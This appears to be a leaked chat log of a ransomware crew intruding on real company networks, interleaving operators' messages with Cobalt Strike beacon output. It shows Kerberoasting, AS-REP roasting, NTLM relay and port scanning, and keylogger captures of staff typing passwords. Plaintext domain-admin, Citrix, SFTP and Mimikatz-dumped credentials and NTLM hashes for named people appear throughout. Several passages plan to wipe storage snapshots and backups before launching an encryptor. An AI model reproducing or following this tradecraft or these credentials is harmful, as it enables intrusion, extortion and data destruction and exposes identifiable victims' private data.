DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com
```

```
Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\hashes.txt -append -force -encoding UTF8
```

translate into a file with hash format
actually it seems that the one you have already given us in Slack you have also discounted
lotrettedfu read carefully, enough already) like this
http://githubcom/EmpireProject/Empire/blob/mob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
give me a link to the invoke kerb with which you shoot the OS

[+] received output:
2020-09-24T00:20:44 - HTTP request for / received from 10.59.0.243
2020-09-24T00:20:44 - HTTP NTLMv2 challenge/response captured from 10.59.0.243 (RAJA-9298):
raja-9298::ZOHOCORP:…

```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe asreproast /domain:ru.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /domain:ru.zohocorpin.com
[+] host called home, sent: 318067 bytes
[+] received output:
(Rubeus banner) v1.5.0

[*] Action: AS-REP roasting
[*] Target Domain : ru.zohocorpin.com
[*] Searching path 'LDAP://win2k12master.csez.zohocorpin.com/DC=en,DC=zohocorpin,DC=com' for AS-REP roastable users
[+] received output:
[X] Error executing the domain searcher: A referral was returned from the server.
```
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe asreproast /domain:tsi.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /domain:tsi.zohocorpin.com
[+] host called home, sent: 318069 bytes
[+] received output:
(Rubeus banner) v1.5.0

[*] Action: AS-REP roasting
[*] Target Domain : tsi.zohocorpin.com
[*] Searching path 'LDAP://win2k12master.csez.zohocorpin.com/DC=tsi,DC=zohocorpin,DC=com' for AS-REP roastable users
[+] received output:
[X] No users found to AS-REP roast!
```

```
beacon> execute-assembly Rubeus.exe kerberoast /domain:ru.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /domain:ru.zohocorpin.com
[+] host called home, sent: 320115 bytes
```

it's been like this for about 5 minutes, nothing, I think I'll try again with rubeus?

```
beacon> psinject 24992 x86 invoke-kerberoast -domain ru.zohocorpin.com | fl
[*] Tasked beacon to psinject: invoke-kerberoast -domain ru.zohocorpin.com | fl into 24992 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server.
ERROR: "
ERROR: At line:990 char:20
ERROR: +             else { $Results = $UserSearcher.FindAll() }
ERROR: +                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR:     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
ERROR:     + FullyQualifiedErrorId : DirectoryServicesCOMException
```

Really? I saw it the first time, too. Where's the invoc kerb on trusts?
```
dn:CN=tsi.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2011/11/12-21:30:09 UNKNOWN TZ
>name: tsi.zohocorpin.com
>securityIdentifier: S-1-5-21-485680246-861548126-816136305
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: tsi.zohocorpin.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=en.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2017/12/31-13:18:45 UNKNOWN TZ
>name: ru.zohocorpin.com
>securityIdentifier: S-1-5-21-923540578-3079758315-1995498360
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ru.zohocorpin.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
```

Where are the trusts? OK, missed it apparently, never mind, but for future reference again - psinject is better than powerpick :woozy_face:

```
beacon> powerpick invoke-kerberoast | fl
[*] Tasked beacon to run: invoke-kerberoast | fl (unmanaged)
[+] host called home, sent: 133715 bytes
[-] could not spawn C:\WINDOWS\sysnative\mstsc.exe: 5
[-] Could not connect to pipe: 2

beacon> psinject 24992 x86 invoke-kerberoast | fl
[*] Tasked beacon to psinject: invoke-kerberoast | fl into 24992 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:
TicketByteHexStream :
Hash : $krb5tgs$http/its-winca.csez.zohocorpin.com…
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com
[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt
```

Why do you keep using powerpick instead of psinject? I'm writing INVOKE-KERBEROAST, what does this have to do with Invey?
```
beacon> powerpick Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,Session
[*] Tasked beacon to run: Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,Session (unmanaged)
[+] host called home, sent: 133715 bytes
[-] Could not connect to pipe: 2
```

That's right, so on any error - command and output immediately in the message to the conf
powerpick Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,Session
Possible I start wrong immediately command -invoke does not work and can work with Rubus) Rubus better
the invoc kerberost on trusts does not work as i remember
try to set invoc kerberost on trusts
(the same two trust records for tsi.zohocorpin.com and ru.zohocorpin.com repeated here)
Do you have any dtrusts? have done ad_find, seatBelt, ChromeSharp, winpeas, rebeus, Inveit, tried every possible exploit.
user9 user7 user2 user1
vind 2008
https://adsecurity.org/?p=1255
No
YES
not yet?
OU=Domain Controllers

```
ruestadc.localzoho.com [172.20.3.7] (Windows Server 2012 R2 Standard)
tsi-csez-adc.csez.zohocorpin.com [192.168.65.81] (Windows Server 2012 R2 Standard)
est-adc2.csez.zohocorpin.com [192.168.100.93] (Windows Server 2012 R2 Standard)
est-adc.csez.zohocorpin.com [192.168.100.61] (Windows Server 2012 R2 Standard)
win2k12master.csez.zohocorpin.com [192.168.100.27] (Windows Server 2012 R2 Standard)
```

\\CROCKETSTORAGE\D$\Shared\AlloyCrkt01 Data\Shared\MS Outlook PST Backup Utility
I'm going to reset ad_users, I think it's not fullnet, it's ps running through the file manager
citra is it rp from citra? how many people in the domain and pc? its not in local and not in ad_users but can run from admin user bbbwalkerj
did you enter through this citra? https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
what is the link local admin? it also happens if you do not guess with the port + Citrix, run the ps from the admin and I use it) ps4? and where did you come from?
i have a good night tomorrow at 2
session in the slipstream then we'll leave it for tomorrow, is the news not available?
the rest tomorrow and if it's past then we'll wait 20 minutes
for the domain has not risen? yes, i also have all fallen out of it... but it pings by name... no, he needs to change the ns record, so the computers will see the new dk. if the dns live
authentication failed? he probably raised the external, so that at least something in the network to work and you can understand what's happening and external dk ips looks like an external ips
https://192.168.0.254/

```
Pinging wwdc1.waterway.com [104.130.139.13] with 32 bytes of data:
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50

Ping statistics for 104.130.139.13:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms
```

```
Pinging wwdc2.waterway.com [104.130.139.13] with 32 bytes of data:
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50

Ping statistics for 104.130.139.13:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms
```

9512

```
beacon> shell net accounts /dom
[*] Tasked beacon to run: net accounts /dom
[+] host called home, sent: 48 bytes
[+] received output:
The request will be processed at a domain controller for domain waterway.com.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.
```

No authorization is up yet
The whole company is fucked. What's the situation? No authorization is up yet? Is it up yet?
Waterway 11915Wnas2179!
http://192.168.0.3:5000/
192.168.62.30:5000
and you only wiped nimble? OK, then come here.
I thought it was easier for you to share this kind of info off-line. You're not alone here. Why should I send everything to you? Waterway IT - Agent - Mozilla Firefox ======= LoveUnit14! [backspace] [backspace] so we are hoping [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace][backspace]. LastPass - Set Master Password - Mozilla Firefox ======= LoveUnit14[tab]88Maybe253![control][ctrl]a77Maybe253![backspace]*!77Maybe253*!7M*! My LastPass Vault - Mozilla Firefox ======= 77Maybe253*! 77Maybe253*! LogMeIn Accounts - Mozilla Firefox ======= 31444895591155163 Waterway Gas & Wash - Mozilla Firefox ======= 77maybe253*! 77Maybe253*! ´´20 min periodjust monitor on the topic of network disconnectiondomain authorization mb will fix))) and watch on the topic? or something else? bitch) youtubchik watchkak their situation? not sure yet found in their downloads one more pst accountant on 223 megabytes@tl1 i will encrypt the admin cars, they have backups there can locally take the files it seems their networka lot we there nabakapili? 1 the fuck for all the cashes support processiongbpltw but will be experienced of course turned out ...+nimble to 0? We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential, you can sign in with that credential. I'm looking, but there's no such thing as a counterpart of the kazina. You can't restore it by yourself, can you? beacon> shell net group "domain admins" /dom [*] Tasked beacon to run: net group "domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain waterway.com. System error 1355 has occurred. The specified domain either does not exist or could not be contacted. 
is the domain down? is the shara working in parallel only with the token will get in trouble now we'll pull what's pulling and let the buildd go now let it all go most likely not all unshared because with dk launched bild? orbs and bild one bild by one batton so on the list of armies let but do not start tell me how to run the bild will be snapped by three there start the more the better let a few pieces of armies only armies remained ...if they killed all the servers and will decide from there what to expect, they will now go to nimbly wait for the nimblys then let the armas? + all the virtuals have died? in a hurry once started delete the snaps in any case ahahahahahanet, fuck, looks like all the same on nimblys not snapshotshod we crash the servers along with the volume on the nimblys have crashed? beacon> shell ping -n 1 192.168.0.192 [*] Tasked beacon to run: ping -n 1 192.168.0.192 [+] host called home, sent: 54 bytes [+] received output: Pinging 192.168.0.192 with 32 bytes of data: Reply from 192.168.0.122: Destination host unreachable. Ping statistics for 192.168.0.192: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), ``the spare koba''. 173.234.155.15 https://avsix.com ---------------------------------------------------------------------------------------- 206.221.188.106:63254 edbDkh6n9sCjfeYJLyFby0q5tKCzuscVSnj but i can't find it, i can't read it properly, i should have turned it off, but @user4 wrote it, no way did you delete it?[ ](https://mediaeveryone.com/group/waterway-com?msg=mG4g2Ci86s7PZ5c7y) this is what's bothering me, as long as it's connected, it won't let me delete it, did you delete it?ahahahahaha ran pre.bat all over adpogonali guys also three other external backs were? pogonalipognaidak what the fuck, and there and armas will be unshared all i let delete snaps how long will it shake? on 1 ping request could not find the site well fuck with nimin 4 annichable from most hosts + and psek past? 
on 4 no 445 was 1619 servers was not it?dak their 7 tamas you are operational) and then at the moment erase snaps and startuparms are unsharedSIDH*G&8SDIGvS*DIF^*GSHIGUYRHservers are theretoyou do network but at the moment when the servers will be pulled under 0 i think so too, yes, it is written that snapshots of their virtuals in another place?and inside? nice to find) check the contents of the live ones,just a cluster is not virtuals? all the backups will delete everything?and a maximum of 10 minutes here time is not on the clock to lock or unlock the pc + run pre.bat run the lockerinternaldelete externals all in one moment all in one placeaha ok, the secondParsons smoking is the second? waterway.com WIN SERVER: by AD: 16 Alive: 11 (including those without 445) Attracted: 7 no 445: PDITESTSQL.waterway.com reporting.waterway.com WWSQL2Old.waterway.com wwsql02.waterway.com Destination host unreachable (I pinged from different hosts, this is the case everywhere): PDIProdWeb2016.waterway.com WW2K1Old.waterway.com WWSQLOLD.waterway.com WATERWAYDSC02.waterway.com ARMS: AD: 294 Alive: 200 ``When``brandon`` is login`11915Ns2179!!!`` pass from nibble what else on keylog? keylog fucks up some of the characters``setg Proxies socks4:172.93.105.2:48307```115279[tab]1Ns1!1915N29!s17[tab]19N79![tab]115s21!115N219s17[tab]19159!1N179!!11s217s2[tab]195N9!!!No, I'll try it from there, but why are you throwing socks from there? Yeah, did you try the one above? and all passwords that were this one? 11915ITMan2179! no it does not work check all combinations with his account by username[ ](https://mediaeveryone.com/group/waterway-com?msg=94ftydX3Phhq5H7AG) aha here are usernames+ with a dog in nimble him on the screen at least so blauerbradon you have tried under what? administrator what else is in questionneither this pass did not work? 195N9!! none of them fit? +) Waterway Gas and Wash | Slack ======= Nobogi t [backspace]sin nto tnbe[backspace]he imle pls. 
[backspace] aeI [backspace]I[backspace][backspace] ao [backspace][backspace][backspace][backspace]Im ns[backspace][backspace]s lokIt i ced w [backspace]t[backspace]te momdona [backspace]t hent. [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace][backspace][backspace] [backspace] [backspace] [backspace] [backspace]tr [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] y toI o [backspace][backspace]kowdnt't n who s calliait bing bout yt i doesma nyI[backspace]u not kea sense. it isathink [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace] oensmoeTis[backspace][backspace][backspace] o[backspace I [backspace][backspace]t[backspace]It sdl[backspace][backspace][backspace]p[backspace][backspace][backspace][backspace]founs ik[backspace]his[backspace][backspace][backspace][backspace][backspace]e fih[backspace][backspace]elss[backspace]phicyisyto meTer wo[backspace]h[backspace][backspace][backspace]s[backspace]h . heud noreal be s[backspace]ftem d[backspace]all. on or h to comeoeoc. I a[backspace]sn t allv[backspace]vloehae ckdtnfrn i dow o ow. New Tab - Google Chrome ======= .8 New Tab - Google Chrome ======= 19216.0.75 ======= m[backspace][backspace] ======= nibil[backspace]e[backspace][backspace][backspace][backspace][backspace]19218[backspace][backspace][backspace][backspace].60.7[backspace][backspace][backspace].755[backspace]0.2[backspace] 192.168.0.75 - Nimble Storage - Google Chrome ======= 91 192.168.0.75 - Nimble Storage - Google Chrome ======= 115279[tab]1Ns1!1915N29!!s17[tab]19N79![tab]115s21!115N219s17[tab]19159!1N179!!11s217s2[tab]195N9!! New Tab - Google Chrome ======= 192. 
New Tab - Google Chrome ======= Privacy error - Google Chrome ======= 192 BdTrayInvWindow ======= [alt] BdTrayInvWindow ======= [alt] Cortana ======= e Cortana ======= not Untitled - Notepad ======= [ctrl]v Untitled - Notepad ======= [control] (+) Waterway Gas and Wash | Slack ======= Wa C (+) Waterway Gas and Wash | Slack ======= htP has[backspace][backspace][backspace][backspace]aacs[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]hs ces[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]iyou uat you srd?Dd pde[backspace]drpaswo Reve [backspace][backspace][backspace][backspace][backspace][backspace]mv[backspace]o[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] All Devices - Google Chrome ======= 12.168[down] All Devices - Google Chrome ======= 9[down]. New Tab - Google Chrome ======= 218.0 New Tab - Google Chrome ======= 19.6. 
Cortana ======= d Cortana ======= mc[backspace][backspace][backspace][backspace]cmd Command Prompt ======= nettat Command Prompt ======= s Cortana ======= mc Command Prompt ======= louparkt Cortana ======= d Command Prompt ======= nsok meing All Devices - Google Chrome ======= tor All Devices - Google Chrome ======= se Remote Desktop Manager Free [wwsql] ======= c Remote Desktop Manager Free [wwsql] ======= [down] All Devices - Google Chrome ======= e All Devices - Google Chrome ======= mik (+) Waterway Gas and Wash | Slack ======= Yee nade it (+) Waterway Gas and Wash | Slack ======= s I creatdo nd add tothet puwopojshosh rect[backspace][backspace][backspace][backspace][backspace][backspace]pot rjec.ale rtrady ceae tdiadn D yunido eei[backspace][backspace]som io ri? d nenffom t Why not[ ](https://mediaeveryone.com/group/waterway-com?msg=6PW4HbwfGTT4T5933) change all passwords[ ](https://mediaeveryone.com/group/waterway-com?msg=mdGqYwYbvv8fgZwx8) give me the full log, then nimbles can be turned on to block our access, they see where the letter came from until they wake up at the time to block your backup system to enter?i have locked it down promises not to lock it so he says it's a bad letter, i don't know what kind of letter it is the other one1 asks what it is, a ticket or a voicemail the first responds so it throws our message does not seem it forwarded from the incident with the password to the same RE see this file our message that we sent a file? [ ](https://mediaeveryone.com/group/waterway-com?msg=qCu3zj4Msa5t28oTk) fix where was the passkey, does not fit this passkey should be115s21! 
check it) `` New Tab - Google Chrome ======= 19216.0.75 ======= m[backspace][backspace] ======= nibil[backspace]e[backspace][backspace][backspace][backspace][backspace]19218[backspace][backspace][backspace][backspace].60.7[backspace][backspace][backspace].755[backspace]0.2[backspace] 192.168.0.75 - Nimble Storage - Google Chrome ======= 91 192.168.0.75 - Nimble Storage - Google Chrome ======= 115279[tab]1Ns1!1915N29!!s17[tab]19N79![tab]115s21! `````` ]Hey Latoya, Unfortunately, we do not know what the password for this would be as it was originally set by someone in CCC>[backspace][backspace]. My c[backspace]recomendation, if n[backspace]no one knows the password, woul dbe to follow the forgot password instruction[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][link/[backspace][backspace][backspace][backspace]te[backspace]re[backspace]uctions using [control][ctrl]v ``` ``` Please let me know if you need anything else from us ot [backspace][backspace]r[backspace]or if you have ``Any pass? Mail - mpusatera@waterway.com - Google Chrome ======= 1853[backspace][backspace][backspace][backspace][backspace][backspace][backspace]Gators1853[tab]Morgan914[tab]Morgani[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][Morgan914 Outlook - Google Chrome ======= Morgan914 New Tab - Google Chrome ======= change outlook ``` this must be the new email password mapusateramharper[ ](https://mediaeveryone.com/group/waterway-com?msg=AenPRtGWoPZW39ARz) whose keylog? 
192.168.0.75 - Nimble Storage - Mozilla Firefox ======= administrator[tab]1854[backspace]3Gatr[control][ctrl]a1853Gators mharper[tab]LoveUnit14*[tab][tab][tab][right]@waterway.com LoveUnit14* SQL Search - Microsoft SQL Server Management Studio ======= [ctrl][control]v ``Slash starta hai bezi with mailoni also pick up`` 192.168.0.75 - Nimble Storage - Mozilla Firefox ======= administrator[tab]1854[backspace]3Gatr[control][ctrl]a1853Gators mharper[tab]LoveUnit14*[tab][tab][tab][right]@waterway.com ``Task is just catching100%will they be changing the shumihalovym)well hz, they wrote that they serviced a couple of months ago and probably changed the I think you locked the admin account then...wait lol)no, he tried to log in as admin\administrator caught the access?blauer[ ](https://mediaeveryone.com/group/waterway-com?msg=vZuDXyXu9LuYCpFn3) who's sitting here? well this reverse timer says he didn't send it so i'll try to authorize under this pass nibblewith nibblewith this dc, didn't he logged in? Remote Desktop Manager Free [wwdc1] ======= [down] con[down][up]t ateray99! Wwill1Vana2 ``` monitor the ``bluetooth``. Waterway IT - Agent - Google Chrome ======= i ou[backspace]osrth [backspace]n udo[backspace]i ta ha dthh balot wng e ``and specifically she's got the keylogger up crookedly she's logging in chicly everything's under control @user7 I think I've got the harperMark and Brandon 192.168.0.75 - Nimble Storage - Google Chrome ======= to15 192.168.0.75 - Nimble Storage - Google Chrome ======= [backspace] 192.168.0.75 - Nimble Storage - Google Chrome ======= r8 192.168.0.75 - Nimble Storage - Google Chrome ======= Gs 192.168.0.75 - Nimble Storage - Google Chrome ======= 3 ``))))) on runettesI looked at my last pass and the last thing I had for this is administrator and the administrator password for this connection. I think a couple months back that Mark and Brandon were doing some maintenance and they might have had to reset this not sure though. They might know it. 
I mean I would hope so at this point.... so they don't know the password themselves) says "fuck me" in the last one. 192.168.0.75 - Nimble Storage - Google Chrome ======= a Inbox - djarden@waterway.com - Outlook ======= Ila as a [backspace][backspace] frhimstt dsdor[backspace]ftkac t MndBnow dno [backspace]t [backspace]tnc y h u ho[backspace]wi [backspace][backspace] iath ith mn o lo a s pin[backspace][backspace]. Waterway IT - Agent - Google Chrome ======= bl i edal ``Yeah noticed before it was fine and stood up crvokstat says the connection is wrong What the fuck is not keylogging? and I do not understand the fun) go to the screenshots it does? only this caught `` 192.168.0.75 - Nimble Storage - Google Chrome ======= a Did it come in or not? Inbox - djarden@waterway.com - Outlook ======= ik ======= 6[backspace]. 192.168.0.75 - Nimble Storage - Google Chrome ======= a Inbox - djarden@waterway.com - Outlook ======= Ila as a [backspace][backspace] frhi If there is no pass from there))) if not tomorrow morning, then wait for the moment, there are messages on the mail? judging by the keylogum not much they are going to there then close the network if the pass nimbly pops up then do `` setg Proxies socks4:209.222.97.8:6731 ``Give the socks workers no alerts or not``? [-] screenshot from desktop 2 is empty CurrentUser : WATERWAY\mapusatera Idletime : 00h:04m:33s:063ms (1326343 milliseconds) ``empty`` - nothing in the keylog, did any of the mail have a nimble login alert? Nothing else? Waterway Gas & Wash - Mozilla Firefox ======= michaelpusatera@gmail.com[tab]w[backspace]w@terw@y w@terw@y `````` Waterway Gas and Wash | Slack - Google Chrome ======= does anyone recod[backspace]gnize this email adre[backspace][backspace]dress? [control][ctrl]v All, I removed some old accounts from the internals [backspace][backspace] site / API. 
I t[backspace]dont'[backspace][backspace]think this should cause any issues as the [backspace][backspace][backspace]i don't thin[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][a[backspace][backspace][backspace][backspace][backspace] since any of the accounts have been used recently. if you notice any issues, please let me know. ``Not on the phone by any chance? because there in the mail someone complained about a phish letter from bobane to mail@tl1 and who sent the letter ? Inbox - djarden@waterway.com - Outlook ======= [delete][down][down][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][down][up][up][down][delete][delete][delete][delete][delete][delete][delete][down][down][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][down][down][down][delete][delete][delete][delete][delete][down][down][delete][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][down][delete][down][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][delete][delete][delete][delete] `````` Inbox - djarden@waterway.com - Outlook ======= [delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][ctrl]c ``Basically, this is what it's all about''. Windows Security ======= Myoldpassword6* MyNew[backspace][backspace][backspace][backspace]Myoldpassword6* ``+djarden does it have keylogs? 
[-] screenshot from desktop 2 is empty ``And now there's 16-17 hours in the keylog, it looks like it's been on 24 hours`` CurrentUser : WATERWAY\mharper Idletime : 00h:43m:30s:657ms (2610657 milliseconds) `````` waterway.com WIN SERVER: by AD: 16 Alive: 11 (including those without 445) Attracted: 7 no 445: PDITESTSQL.waterway.com reporting.waterway.com WWSQL2Old.waterway.com wwsql02.waterway.com Destination host unreachable (I pinged from different hosts, this is the case everywhere): PDIProdWeb2016.waterway.com WW2K1Old.waterway.com WWSQLOLD.waterway.com WATERWAYDSC02.waterway.com ARMS: AD: 294 alive: 200 Didn't ask he cleared his desktop? Slack? Just a bunch of errors, no noise on the mail? but keep monitoring nimble nimble nimble192.168.43.8 192.168.43.8 - Google Chrome ======= Admin1Vanilla2 Admin[tab]Admin [alt][alt] Waterway Gas and Wash - Google Chrome ======= MyNewPassworx6[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace][backspace][backspace] [backspace][tab][right][backspace]Djarden6* Waterway IT - Google Chrome ======= djarden@waterway.com[tab]MyNewPas[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]Djarden6* ``and take screenshots see what kind of movement see the keylogging then monitor the mail for noiseotnoo, the keylogs are hanging, nimbles and mail is opentoo everything is ready?either at night or close at once from noise-mail monitor on the situation nimbles are open as soon as we catch immediately enter through soks with the same machine within an hour after 18 wait for the passkeylog hangs on itishnicksharms to ping, yes pre.bat runtut are we all ready? to the live ones I attributed those without ports` `` waterway.com WIN SERVER: by AD: 16 Alive: ~11 Attracted: 7 1. 
here newpcforsomeone arm pulls instead of PDITESTSQL ping PDITESTSQL.waterway.com Pinging PDITESTSQL.waterway.com [192.168.0.127] ping -a 192.168.0.127 Pinging newpcforsomeone.waterway.com [192.168.0.127] beacon> portscan PDITESTSQL.waterway.com [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on PDITESTSQL.waterway.com [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete 2. PDITESTWEB.waterway.com Ping request could not find host PDITESTWEB.waterway.com. Please check the name and try again. 3. beacon> portscan reporting.waterway.com [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on reporting.waterway.com [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete 4. beacon> portscan WWSQL2Old.waterway.com [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on WWSQL2Old.waterway.com [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete 5. beacon> portscan wwsql02.waterway.com [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on wwsql02.waterway.com [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete 6. Destination host unreachable: PDIProdWeb2016.waterway.com WW2K1Old.waterway.com WWSQLOLD.waterway.com WATERWAYDSC02.waterway.com Pinged from different hosts, everywhere like this ``I'm going to pick up a log and send it to a ticket at ITSport, maybe there will be something there. spiceworks tyler.terzigni@grantweber.com st@yntru3 ````https://10.10.10.8/cgi-mod/index.cgi ``the baracuda`` --- IE/Edge Credential --- Vault Type : Web Credentials Resource : https://login.live.com/ Identity : robert.nye@grantweber.com Credential : LastModified : 6/28/2020 9:06:43 PM ``Shutdown Procedure Log onto 10.10.10.2 -- Use VMWare VSphere Client to log onto the VMWare host servers. 
(192.168.75.100, 192.168.75.105, 192.168.75.115, 192.168.75.120, 192.168.75.130) Shut down the individual servers, then after the server are shut down, place the VMWare host in "Maintenance Mode" then shut down the host Do this for each vmware host server After all servers are shut down then shut down the 10.10.10.2 and 10.10.10.3 and 10.10.10.20 , 10.10.10.22 servers The log into http://10.10.11.251 , launch as an application and log in to the equallogic, and shut it down. Log onto thecus and power it down ` 10.10.10.30 user name admin pass admin Startup procedure , simply reverse this order, wait at least 5 mins after powering on the equallogic to power on the vmware servers....`` FTP User name -- conway password -- C@r30fC0nw@y Host address is -- sftp.grantweber.com The port is -- 22 Protocol is -- sftp `````` FTP User name -- pahranagat password -- $3cur32GW Host address is -- sftp.grantweber.com Port is -- 22 Protocol is --- sftp ``esxi without 22 from kcs doesn't work anywhere but kcs`` DA CREDS: grantweber.com\administrator 2016GW@Calabasas grantweber.com\tyler.terzigni st@yntru3 grantweber.com\casey.covello grant2021 grantweber.com\robert.nye grant2020 grantweber.com\jimi.bingham grant2017 grantweber.com\stanleyford c7615aa7f26bfa244265524d6e298ecc grantweber.com\monitor.acct 190d7c1850cd42a7197a6bd805f50bc9 MIMIKATZ CREDS: ___________________________________________________________________ Creds: |Ports/Info:|Valid: ____________________________________________|___________|__________ Username : GRANTWEBER0\root | 22 | Domain : 10.10.10.220 | kcs | + Password : D@kc$1 | ____________________________________________|___________|__________ Username : grantweber0\administrator | 80,443 | Domain : 10.10.10.233 | Telephony | Password : GW3b3r2014 | ____________________________________________|___________|__________ Username : grantweber\jimi.bingham | Domain : 10.20.0.101 | dead | Password : THECOVE | HYPER-V (from AD): gwca-hv-akcelerant.grantweber.com 
[10.10.10.20] ESXi (it won't let you login, only download the client): 192.168.76.130 192.168.76.122 192.168.76.121 192.168.76.120 192.168.76.118 10.40.10.237 10.40.10.236 10.40.10.235 10.10.10.27 NAS: 10.10.10.30 User: admin Pass: admin ````192.168.45.109```` 192.168.76.130:8100 192.168.76.130:8000 192.168.76.130:5989 192.168.76.130:902 192.168.76.130:443 192.168.76.130:427 192.168.76.130:80 192.168.76.123:8100 192.168.76.123:8000 192.168.76.123:5989 192.168.76.123:902 192.168.76.123:443 192.168.76.123:427 192.168.76.123:80 192.168.76.122:8100 192.168.76.122:8000 192.168.76.122:5989 192.168.76.122:902 192.168.76.122:443 192.168.76.122:427 192.168.76.122:80 192.168.76.121:8100 192.168.76.121:8000 192.168.76.121:5989 192.168.76.121:902 192.168.76.121:443 192.168.76.121:427 192.168.76.121:80 192.168.76.120:8100 192.168.76.120:8000 192.168.76.120:5989 192.168.76.120:902 192.168.76.120:443 192.168.76.120:427 192.168.76.120:80 192.168.76.118:8100 192.168.76.118:8000 192.168.76.118:5989 192.168.76.118:902 192.168.76.118:443 192.168.76.118:427 192.168.76.118:80 192.168.76.118:22 (SSH-2.0-OpenSSH_5.6) 192.168.76.117:8100 192.168.76.117:8000 192.168.76.117:5989 192.168.76.117:902 192.168.76.117:443 192.168.76.117:427 192.168.76.117:80 192.168.76.117:22 (SSH-2.0-OpenSSH_5.6) 192.168.76.116:8100 192.168.76.116:8000 192.168.76.116:5989 192.168.76.116:902 192.168.76.116:443 192.168.76.116:427 192.168.76.116:80 192.168.76.116:22 (SSH-2.0-OpenSSH_5.6) 192.168.76.115:8100 192.168.76.115:8000 192.168.76.115:5989 192.168.76.115:902 192.168.76.115:443 192.168.76.115:427 192.168.76.115:80 192.168.76.115:22 (SSH-2.0-OpenSSH_5.6) 